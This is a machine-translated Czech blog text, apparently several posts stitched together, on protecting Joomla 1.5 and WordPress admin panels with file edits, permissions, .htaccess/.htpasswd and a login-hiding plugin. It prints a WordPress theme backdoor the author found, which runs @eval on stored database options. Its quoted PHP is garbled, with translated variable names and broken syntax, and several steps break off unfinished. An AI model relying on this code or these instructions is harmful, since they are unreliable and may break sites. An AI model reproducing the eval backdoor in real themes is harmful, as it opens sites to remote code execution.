Dobrý den, milí čtenáři tohoto blogu. Dnes chci mluvit o bezpečnosti práce a některých metodách ochrany webových stránek před hackováním. Bohužel nejsem v této oblasti odborník a mé znalosti nepřesahují rámec článku o, ale jednoduše popíšu své nedávné zkušenosti. Nepoužil jsem nic složitého, ale doufám, že to zvýší bezpečnost práce s mými stránkami.
Jde o to dvojité ověření pro přihlášení do panelu správce motoru vaše webové stránky (mělo by fungovat na jakémkoli CMS, ale osobně jsem to testoval pouze na WordPress a Joomla). Ochrana je nainstalována na úrovni serveru, takže všechny pokusy o uhodnutí hesla pro admin panel (hrubá síla) nezpůsobí zvýšené zatížení hostingu a je poměrně obtížné to obejít. Jeho instalace je snadná (doslova v několika krocích) a ze všech znalostí vyžaduje pouze pozornost a možnost přístupu na stránky přes FTP.
Uvedu také několik akcí, které jsem aplikoval na stránky na již zastaralých motorech Joomla 1.5, na které nemá smysl přenášet, ale které neustále narušují můj server a používají server k rozesílání spamu. Popsané akce jsem provedl nedávno, takže nemohu potvrdit, že stránky přestaly být infikovány viry, ale doufám, že ano. Obecně jsem se trochu snažil zvýšit odolnost proti trhlinám Joomla 1.5.
Jak chránit Joomla 1.5 před hackováním a viry
Jak jsem uvedl výše, problém je v tom, že dva z mých webů, na kterých běží Joomla 1.5, jsou neustále hackovány. Můžeme je považovat za opuštěné, protože do nich nepřidávám nové materiály, ale pravidelně generují příjmy (z zveřejňování článků z Miralinks a Webartex, stejně jako odkazů z Gogetlinks). Obecně je škoda je vyhodit a přenést je na novou verzi motoru je ztráta (ztráta času a úsilí).
Nezbývá než buď neustále sledovat zátěž na serveru, a když se zvýší, hledat mezi soubory enginu shelly a další malware, nebo nějak posílit ochranu. Abych vyhledával malware, stáhnu si soubory motoru do svého počítače a naskenuji je pomocí DoctorWeb a Aibolit. První nenajde všechno a druhý vidí nepřítele příliš často tam, kde žádný není, ale neznám jiné účinné metody. I když existují také desítky programů, ale to je pohodlnější pro každého.
Mimochodem ten scénář Aibolit může fungovat nejen na serveru, ale i přímo na počítači ve složce se staženými soubory motoru (jen nezapomeňte při stahování stránek zakázat standardní antivirus, protože může některé soubory smazat, ale stejně zůstat na serveru).
Podrobný návod je uveden ve videu níže, ale ve zkratce si z webu Microsoftu stáhnete PHP jazykový interpret a nainstalujete jej. Poté otevřete soubor skriptu Aibolit s názvem ai-bolit.php pomocí tohoto interpretu:
Rychlost skenování závisí na rychlosti vašeho počítače a počtu souborů na vašem webu. Trvalo mi několik hodin pro https://stránku, protože Aibolit podezřívá dokonce i obrázky ze skrývání virů a těchto obrázků mám spoustu a soubory mezipaměti při skenování zabírají spoustu času. U stránek na Joomla 1.5 bylo ověření mnohem rychlejší.
Rozhodl jsem se strávit den hledáním způsobů, jak zlepšit zabezpečení webových stránek. Stihli jsme toho velmi málo, ale pořád lepší než nic. Začněme s posílení ochrany (a snížení zranitelnosti) dvou stránek na Joomla 1.5. Bylo provedeno následující:
Jak jinak chránit Joomlu 1.5 před viry a streamovacími hacky
- Také „experti“ tvrdí, že stránky na Joomla 1.5 jsou „jednou nebo dvakrát“ poškozeny použitím toho, který je k dispozici v enginu (prý můžete přes něj změnit heslo správce). I když na svém webu nepoužíváte registraci a nikde nezobrazujete odkaz pro obnovení, neznamená to, že jste tuto chybu zabezpečení zakryli. Stačí přidat následující úryvek do adresy URL domovské stránky vašeho webu a získat funkci, kterou hledáte: /index.php?option=com_user&view=reset
Chcete-li tuto mezeru uzavřít (ale stále nerozumím tomu, jak ji použít k hackování), můžete jednoduše smazat následující soubor:
/components/com_user/models/reset.php Je pravda, že poté již žádný z uživatelů registrovaných na vašem webu nebude moci používat funkci obnovení hesla, ale pro mě to nebylo důležité, protože registrace nebyla poskytnuta.
- Také říkají, že takový užitečný trik, jako je přidání na adresu stránky, také umožňuje autorům virů a lovcům majetku jiných lidí dostat se do některých citlivých oblastí vašeho webu a učinit jej destruktivním nebo jiným způsobem zneužít. Tato věc je opět odstraněna úpravou jednoho ze souborů motoru.
/libraries/Joomla/application/module/helper.php
Zde musíte odstranit dva kusy kódu nebo je zakomentovat a uzavřít do /* a */ (tento kód jazykový interpret nespustí). První fragment je takto:
If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $pozice; $vysledek->obsah = $pozice; $vysledek->pozice = $pozice;
A ta druhá je taková:
If(JRequest::getBool("tp")) ( $attribs["style"] .= " obrys"; )
Ve skutečnosti poté resetujete mezipaměť a pokusíte se zobrazit pozice modulů ve vaší šabloně pomocí této konstrukce:
Https://site/?tp=1
- Pokud to nevyšlo, doufejme, že jste tuto díru uzavřeli. Stránky jsou velmi často hackovány nikoli zvenčí, ale zevnitř. Trojské koně a keygeny ve vašem počítači vědí, co a kde hledat neukládat hesla v FTP klientech
- (existuje možnost použít pro tento účel, je považováno za ještě chladnější zakázat možnost přístupu na vaše stránky přes FTP, a místo toho, kde jsou přenášené informace (včetně hesel) šifrovány, takže jejich zachycení je zbytečné. Abych byl upřímný, poslední radu zanedbávám kvůli své „temnotě“. Existuje také možnost nastavení přístupu na vaše stránky přes běžné FTP pouze z konkrétní IP adresy (váš počítač), ale můj poskytovatel internetu má dynamickou IP (mění se v určitém rozsahu). Také poradit motor
Oprávnění jsem nastavil na 444 pro soubory v kořenové složce a 705 pro adresáře tmp a logs Samozřejmě jsem to mohl pevněji upnout, ale nemám s tím moc zkušeností a nebyl čas. ztrácet čas experimenty. A kromě toho, to vše hackery vážně neodradí, protože existují věci, které mohou anulovat veškeré naše úsilí. Chcete-li to provést, použijte příkazy jako je tento:
Proto, aby bylo možné zcela „zabetonovat“ soubory enginu Joomla 1.5 před hackováním a zásahy, je nutné zakázat změnu přístupových práv k souborům a složkám prostřednictvím PHP. Dělá se to v nastavení serveru, ale zatím nevím jak a kde. Pokud víte, pošlete odkaz.
- Vše výše uvedené je navrženo tak, aby snížilo pravděpodobnost, že bude váš web napaden a pronikne do něj shelly a další malware. Nicméně přijatá opatření nejsou zárukou, takže by to bylo skvělé na serveru (kde žije váš web Joomla 1.5). To odstraní veškerou negativitu z uniklého zla. Osobně jsem to však z důvodů své „temnosti“ ještě nerealizoval. Byl bych vděčný za odkazy na materiály vysvětlující tento proces.
- Další velmi důležitou poznámkou pro zvýšení zabezpečení vašich stránek před hackováním a virovou infekcí je podle mého názoru dodržovat pravidlo: jeden web – jeden hostingový účet. Ano, je to dražší, ale mnohem bezpečnější. Při hostování na jednom účtu budou všechny vaše stránky okamžitě přístupné přes FTP, pokud malware získá přístup pouze k jednomu z nich. Automaticky ruší stránky a nebylo by rozumné doufat, že skripty nepůjdou nahoru ve stromu adresářů. Navíc je velmi obtížné ošetřit hromadu stránek na jednom hostingovém účtu, protože prací na jednom webu ztrácíte z dohledu ten již vyléčený, který je zároveň infikován.
- Mimochodem, mohou se zlomit nejen z vašeho vlastního webu, ale také z webu vašeho hostitelského souseda, pokud se majitelé náležitě nepostarali o vyloučení této možnosti. Hostingový panel (jako např.) lze také hacknout, ale v každém případě je počet hacků vinou hostitele zanedbatelný ve srovnání s počtem hacků z důvodu neopatrnosti majitelů stránek.
Webové stránky jsou velmi často nefunkční po získání přístupu do administrativního panelu. Je jasné, že je chráněna heslem, takže použitím hrubé síly (chytrého výběru) je mnoho, i zdánlivě složitých hesel prolomeno na jedno nebo dvě. Proto admin panel je také potřeba chránit a je lepší to udělat ne pomocí dalších rozšíření, ale pomocí serverových nástrojů. Existuje několik možností ochrany. Můžete například změnit URL admin panelu tak či onak, aby hacker nemohl zahájit svůj špinavý byznys.
Dalším způsobem ochrany, který bude podrobně popsán níže, je vytvoření dodatečné bariéry v cestě útočníka (živé osoby nebo skriptu). Spočívá v zaheslování adresáře se soubory admin (v Joomle je to složka správce a ve WordPressu - wp-admin) pomocí webového serveru. Ukazuje se, že při přístupu k panelu správce budete muset nejprve zadat přihlašovací jméno a heslo pro přístup ke složce a teprve poté přihlašovací jméno a heslo pro přístup k panelu správce motoru. Navíc tím, že prolomí první obrannou linii pomocí metod hrubé síly, nebude malware vytvářet žádné významné dodatečné zatížení serveru, což je dobře.
Jak ochránit administrátorskou oblast vašeho webu před hackováním?
Chci podrobně mluvit o metodě ochrany, kterou jsem nedávno sám použil. Spočívá v zakázat přístup ke složkám, kde jsou umístěny soubory administrativního panelu webu. Ban se nastavuje pomocí úžasného souboru .htaccess, který v podstatě umožňuje vzdáleně ovládat nastavení webového serveru, na kterém je váš web nainstalován. Přitom ví, jak na to selektivně.
Všechny direktivy napsané v .htaccess se budou vztahovat pouze na adresář, ve kterém se nachází. Chcete něco změnit v nastavení celého webu? Poté umístěte .htaccess do kořenové složky. No a nás zajímá jen nastavení ohledně složky se soubory admin, tak to tam umístíme. V Joomle to bude složka správce, ve WordPressu - wp-admin.
S .htaccess samotným si však nevystačíme. Budete také muset použít .htpasswd, kde bude uloženo přihlašovací jméno a heslo pro přístup k této velmi administrativní složce. Heslo navíc nebude uloženo jako prostý text, ale jako šifra MD5. Pomocí něj nebude možné heslo obnovit, ale když zadáte správnou kombinaci do pole hesla, webový server vypočítá částku MD5 pro tuto kombinaci a porovná ji s tím, co je uloženo v .htpasswd. Pokud se data shodují, pak budete povoleni do administrátorské oblasti Joomla nebo WordPress, ale pokud ne, nebudete povoleni.
To je vše, zbývá jen uvést plán do života. Do .htaccess musíte přidat nějaké direktivy. Víte jaké? Nevím. A nějak budete muset převést heslo do sekvence MD5. Problém. Má to však celkem jednoduché řešení. Dobří lidé zorganizovali online službu pro generování obsahu pro soubory .htaccess a .htpasswd na základě vámi vytvořeného uživatelského jména a hesla. Pravda, budete muset zadat i absolutní cestu k administrativní složce, ale to je triviální.
Takže, seznamte se s velkým a hrozným generátor ochrany pro administrátorský panel vašeho webu. Chápu, že? Vymyslíte, nebo nejlépe vytvoříte dvě složité kombinace písmen, číslic a symbolů na něčem, načež je zadáte do dvou horních polí. Jen si je nezapomeňte zapsat nebo je dát do správce hesel, jinak se nebudete moci přihlásit do administrátorské oblasti a budete muset začít dělat vše popsané v této části znovu.
Tady, teď. Znáte tuhle? I když to nevíte, nevadí. Připojte se k webu přes FTP, vytvořte v jeho kořenovém adresáři soubor s libovolným názvem (i s následujícím url_path.php) a přidejte do něj tento jednoduchý kód:
"; echo "Úplná cesta ke skriptu a jeho název: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Název skriptu: ".$_SERVER["SCRIPT_NAME"]; ?>
Poté přejděte do prohlížeče a do adresního řádku zadejte tuto adresu URL (samozřejmě s vaší doménou):
Https://site/cesta_url.php
V důsledku toho uvidíte absolutní cestu, která vás zajímala. Zadejte jej do výše uvedeného generátoru souborů .htaccess a .htpasswd. Nezapomeňte na konec této cesty přidat jméno správce nebo složky wp-admin bez lomítka. To je vše, nyní klikněte na tlačítko „Generovat“.
A jeden po druhém přeneste obsah souborů .htaccess a .htpasswd přímo do stejných souborů.
Doufám, že jste je již vytvořili ve složkách správce nebo wp-admin (v závislosti na enginu, který používáte)?
No a teď se zkuste přihlásit do admin panelu. Zobrazí se okno s výzvou k zadání uživatelského jména a hesla pro váš webový server? V různých prohlížečích se vykresluje jinak, ale v Chrome to vypadá takto:
Pokud něco nefunguje, pak „vykuřte“ absolutní cestu k .htpasswd zapsané v souboru .htaccess. V takovém případě jej stačí ručně opravit při úpravě souboru. To je vše, co jsem vám dnes chtěl říct. Pokud chcete něco kritizovat nebo přidat, pokračujte.
Virus ve WordPressu?
Po napsání tohoto článku jsem na svém blogu (https://site) objevil malware (nebo něco, co bylo nainstalováno mimo mou vůli). Chtěl jsem jen něco změnit v kódu a šel jsem do . Úplně dole, těsně před tagem Body, mě zasáhlo volání nějaké funkce, kterou jsem neznal (na základě jejího názvu, ale nenašel jsem nic užitečného):
Zdá se, že jméno je rozumné. Je pozoruhodné, že asi tři týdny předtím jsem náhodou zjistil, že mám novou tabulku v databázích dvou mých blogů WordPress (https://site a další). Jeho jméno bylo prostě úžasné - wp-config. Opětovné vygooglování tohoto jména nepřineslo nic užitečného, protože všechny odpovědi se týkaly stejnojmenného souboru wp-config.php.
Tato tabulka se rychle zvětšila (až sto megabajtů na https://site) a zapisovaly se do ní adresy stránek mého webu s různými parametry. Protože jsem nepochopil podstatu tohoto procesu, jednoduše jsem tento stůl zboural a je to. Mimochodem mám jiný blog na WordPressu, ale tam nic takového pozorováno nebylo.
No a tady jsem našel takovou „mluvící“ vsuvku do tématu. Rozhodl jsem se zjistit, zda tam nebylo přidáno něco, co by odpovídalo výše popsanému řádku v dolní části zápatí. Ukázalo se, že bylo přidáno. A tak úhledně - ani úplně nahoře, ani úplně dole, ale druhá (nebo třetí) funkce vepsaná shora:
Funkce wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));
To je místo, kde vás okouzlí úžasný „eval“. Pozoruhodné je, že Aibolitovi (popsaný výše) se tento fragment zdál podezřelý, ale ještě jsem se k tomu nedostal, protože tento skript již mnoho lidí podezřívá z nespolehlivosti. Také jsem o tomto kódu googlil a našel příspěvek (bohužel ta doména byla nyní zablokována pro neplacení) popisující podobný problém. Můj přítel vypustil tuhle kravinu s novým tématem, do kterého byl vložen nějaký instalační kód.
Na obou infikovaných blozích mám témata už mnoho let. Musela existovat nějaká zranitelnost v enginu nebo , kterou rychle (na streamu) zneužili nepřátelé. Obecně si ověřte absenci takových inkluzí. Termín úpravy popisovaných souborů byl dle mého názoru v polovině září tohoto roku.
Také vám doporučuji podívat se na výběr z 17 video lekcí o zabezpečení webových stránek na Joomle. Budou se přehrávat jedna po druhé automaticky, a pokud chcete, můžete se přepnout na další lekci pomocí odpovídajícího tlačítka na panelu přehrávače nebo vybrat požadovanou lekci z rozbalovací nabídky v levém horním rohu okna přehrávače:
Užijte si sledování!
Ať se vám daří! Brzy se uvidíme na stránkách blogu
Mohlo by vás to zajímat
Stránky Joomly začaly produkovat spoustu chyb jako - Strict Standards: Nestatická metoda JLoader::import () by neměla být volána staticky v 
Aktualizace Joomly na nejnovější verzi 
Vytvoření mapy pro web Joomla pomocí komponenty Xmap 
Co je Joomla 
Skupiny uživatelů v Joomle, nastavení cachování a problém s odesíláním pošty ze stránek 
Komponenta K2 pro tvorbu blogů, katalogů a portálů na Joomle - funkce, instalace a rusifikace 
Moduly v Joomle - zobrazení pozice, nastavení a výstup, stejně jako přiřazování přípon třídy 
Jak aktualizovat statický web Html na dynamický na Joomla 
Instalace WordPressu v detailech a obrázcích, přihlášení do oblasti WP admin a změna hesla 
Pluginy Joomla – TinyMCE, Load Module, Legacy a další jsou standardně nainstalovány
Vážení klienti! Již více než 3 dny probíhá útok hrubou silou za účelem získání dat z administrativních částí CMS Wordpress a Joomla. V tuto chvíli náš bezpečnostní systém blokuje veškeré pokusy o přihlášení do výše uvedených administrativních částí CMS.
Abyste zabránili hackování vašich stránek a také nebyli na černé listině našeho bezpečnostního systému, důrazně doporučujeme chránit administrativní části vašeho CMS před hackováním, konkrétně skrýt vstup na ně. Příklady metod ochrany naleznete zde: Wordpress - http://forum.searchengines.ru/showpost.php?p=12014848&postcount=181 Joomla -http://e-kzn.ru/joomla/dostup-i-bezopasnost/ zashchita -adminki-joomla.html .
No čtu a čtu. Když jsem se však dostal do práce, pokusil jsem se přihlásit do administračního panelu jednoho z mých stránek, na kterých běží Joomla. K mému velkému překvapení jsem viděl následující zprávu.
Přirozeně, bez zadávání jakýchkoli hesel, v domnění, že jsem byl hacknut, jsem spěchal napsat o svém problému technické podpoře svého hostingu. Jako vždy mi odpověděli do 10 minut.
Chápeš, že jsem byl v šoku. Šokuje mě, jak moc jim na klientech záleží. Proto na základě svých zkušeností nabízím své jednoduché metody ochrana administrátorského panelu před hackováním.
Je to velmi jednoduché. Toto funguje na Joomle 1.5 i Joomle 2.5. Vytvořte soubor v textovém editoru systému Windows s názvem .htaccess. Ano, je to tak. Tečka a poté htaccess a zadejte následující řádky:
ode všech odepřít
povolit od 000.000.00.00
Kde 000.000.00.00 ip našeho počítače. Umístěte tento soubor do kořenové složky správce. To vám umožní přihlásit se do administrativní části webu pouze z konkrétní IP adresy. Chápu, že téměř všechny IP jsou dynamické, to znamená, že se mění po restartu počítače. Zde je na vás, abyste se rozhodli, co je důležitější – pokaždé se přihlaste přes FTP a změňte IP číslo v souboru. htaccess složky správce nebo obětujte zabezpečení webu.
Kromě toho vyrábíme další bezpečnostní opatření k ochraně administrátorského panelu Joomla a samotný web. A to.
Kdysi jsem napsal příspěvek o tom, jak. Metoda je samozřejmě skvělá, pokud je vaše IP statická a na webu pracujete pouze na jednom místě (řekněme jen doma nebo jen v kanceláři).
Osobně se nejen často hýbu, ale ke všemu mohu kouzlit na webu v McDuck nebo se možná budu muset přihlásit do administrátorské oblasti, když jsem na ulici nebo cestuji. Zkrátka metoda blokování IP mi nevyhovuje.
Ale co dělat potom? Přeci jen chci nějak ochránit admin panel. Natolik, že celý adresář /wp-admin je pro lidi zvenčí nepřístupný.
Zdá se mi dobrá možnost přidat na stránku další autorizaci pomocí kombinace .htaccess + .htpasswd.
Ještě pohodlnější je, že toto blokování můžete použít nejen na panel administrátora, ale na celý web, například pokud je váš web ve fázi testování a nechcete jej nikomu ukazovat předem. Zde je návod, jak to bude vypadat (pro Google Chrome se liší v různých prohlížečích):
Celý proces se bude skládat ze dvou kroků. Začněme.
.htaccess
Nejprve si v adresáři webu vytvoříme soubor .htaccess, který chceme chránit heslem. Protože jsme mluvili o správci WordPressu, vytvoříme soubor ve složce /wp-admin.
AuthName Autorizační jméno. Zpráva se zobrazí v okně pro přihlášení a zadání hesla. Chcete-li navíc obnovit uložená hesla v prohlížečích, můžete tuto zprávu jednoduše změnit.
AuthUserFile Absolutní cesta na serveru k souboru s přihlašovacími údaji a hesly (jen .htpasswd). K jeho nalezení použijte PHP funkci getcwd() (Get Current Working Directory).
.htpasswd
| Soubor s uživateli a hesly ve tvaru uživatel:heslo. Heslo musí být poskytnuto v zašifrované podobě. Šifrujeme. |
admin:$apr1$gidPSkjR$qvsL5fMNunK2T17DKSxtR/
Pravděpodobně už víte, jak se dostat do oblasti správy WordPress?
- /admin, tj. takto: http://vaše stránky/admin
- /wp-admin
- /přihlášení
- /wp-login.php
Obecně platí, že všechny první tři možnosti přesměrování vás stále zavedou na stránku: http://your_site/wp-login.php
Ukázalo se, že kdokoli může přidat kteroukoli ze čtyř výše popsaných předpon k adrese vašeho webu a uvidí přihlašovací údaje správce:
To samozřejmě vůbec neznamená, že se do admin panelu snadno dostane kdokoli, protože potřebuje znát i Uživatelské jméno nebo váš e-mail a vaše heslo.
Pokud má váš administrátor přihlašovací jméno: – pak to z vaší strany není vůbec prozíravé a útočník bude muset pouze uhodnout nebo uhodnout vaše heslo.
Navíc jste viděli nápis: Uživatelské jméno nebo e-mail? Ano, ano, WordPress může používat e-mail jako uživatelské jméno. Ale můžete někde na webu uvést e-mailovou adresu, která se shoduje s e-mailem uživatele správce. Ukazuje se, že první věc, kterou může útočník zkusit, je zadat váš e-mail a poté mu WordPress opět pomůže, protože pokud e-mail nebude vhodný, uvidí tuto zprávu:
a pokud je e-mail správný, WordPress napíše, že heslo k němu není správné:
Výsledkem je situace, kdy potenciální útočník, aby mohl hacknout váš web (přístup k panelu administrátora), bude muset pouze uhodnout nebo uhodnout vaše heslo.
Jak ochránit přihlašovací údaje správce před potenciální hrozbou? Odpověď je jednoduchá – zkuste zvýšit počet neznámých potřebných k zadání.
Nyní se podívejme blíže:
- Pokud je to možné, ujistěte se, že E-mail administrátora není nikde na stránce uveden - veřejný E-mail by měl být něco jiného.
- Vaše heslo by nemělo být jednoduché, při instalaci WordPress vám sám vygeneruje složité heslo, pokud ho nechcete používat, vymyslete si nějaké více či méně složité heslo včetně malých a velkých znaků, čísel a některých symbolů jako -, ?, _ atd.
- Vaše uživatelské jméno by také nemělo být jednoduché: admin, manažer, root, správce, uživatel a další jednoduchá slova!
- A nakonec je potřeba zadat třetí nejdůležitější neznámou – změnit přihlašovací URL admin, k tomu si nainstalujte jednoduchý plugin: WPS Hide Login
WPS Skrýt přihlášení
Jednoduchý, bezplatný a docela oblíbený plugin, který vám umožní změnit přihlašovací URL admin.
Po instalaci a aktivaci pluginu musíte přejít do sekce pro správu: Nastavení / Obecné, pak přejděte na úplný konec stránky a podívejte se pouze na jeden parametr přidaný tímto pluginem:
Ve výchozím nastavení plugin navrhuje použití přihlašovacího jména http://yoursite/login - ale to v žádném případě není nejlepší volba! Vymyslete něco vlastního, např. yyy12_go)))
Po změně tohoto parametru nezapomeňte kliknout na tlačítko Uložte změny– v opačném případě s aktivním pluginem budete mít přihlášení přes http://yoursite/login
Určitě se zkuste odhlásit a znovu přihlásit do administrátorské oblasti, ale použijte novou přihlašovací adresu, kterou jste si sami vymysleli, a hlavně ji nezapomeňte!
Po změně vstupního bodu správce se uživateli při pokusu o přístup ke standardním adresám URL zobrazí chybová stránka 404.
Pozor! Pokud náhle zapomenete novou přihlašovací adresu správce, budete muset tento plugin deaktivovat. To lze provést bez přechodu na panel správce, pokud máte přístup ke složkám a souborům webu. Stačí přejmenovat nebo odstranit složku pluginu wps-hide-login, který bude ve složce pluginy(složka plugins se nachází ve složce wp-content).
Výsledkem je, že po aplikaci všech výše uvedených opatření bychom měli obdržet ochranu přihlášení správce se třemi neznámými: E-mail / Uživatelské jméno, složité heslo a vlastní unikátní přihlašovací URL - a to může výrazně zkomplikovat úsilí mladých hackerů)